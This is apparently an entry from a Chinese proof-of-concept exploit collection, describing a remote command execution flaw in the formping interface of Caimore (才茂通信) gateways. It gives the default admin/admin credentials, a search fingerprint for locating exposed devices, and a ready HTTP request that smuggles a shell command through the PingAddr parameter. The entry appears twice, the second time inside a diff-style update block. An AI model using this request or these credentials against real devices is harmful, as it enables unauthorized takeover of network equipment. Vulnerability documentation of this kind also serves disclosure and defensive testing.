Awesome-POC/网络设备漏洞/才茂通信网关 formping 远程命令执行漏洞.md

# 才茂通信 网关 formping 远程命令执行漏洞

## 漏洞描述

才茂通信网关 formping 接口存在远程命令执行漏洞，攻击者通过默认口令 admin/admin 登陆系统后通过命令可以获取服务器权限

## 漏洞影响

```
才茂通信 网关
```

## 网络测绘

```
app="CAIMORE-Gateway"
```

## 漏洞复现

登陆页面，默认口令 admin/admin

![image-20230417100349175](images/image-20230417100349175.png)

验证POC

```
POST /goform/formping
Authorization: Basic YWRtaW46YWRtaW4=

PingAddr=www.baidu.com%7Cls&PingPackNumb=1&PingMsg=
```

![image-20230417100401289](images/image-20230417100401289.png)
update 2024-11-06 14:10:36 +08:00			`# 才茂通信网关 formping 远程命令执行漏洞`

			`## 漏洞描述`

			`才茂通信网关 formping 接口存在远程命令执行漏洞，攻击者通过默认口令 admin/admin 登陆系统后通过命令可以获取服务器权限`

			`## 漏洞影响`

			```
			`才茂通信网关`
			```

			`## 网络测绘`

			```
			`app="CAIMORE-Gateway"`
			```

			`## 漏洞复现`

			`登陆页面，默认口令 admin/admin`

			`![image-20230417100349175](images/image-20230417100349175.png)`

			`验证POC`

			```
			`POST /goform/formping`
			`Authorization: Basic YWRtaW46YWRtaW4=`

			`PingAddr=www.baidu.com%7Cls&PingPackNumb=1&PingMsg=`
			```

			`![image-20230417100401289](images/image-20230417100401289.png)`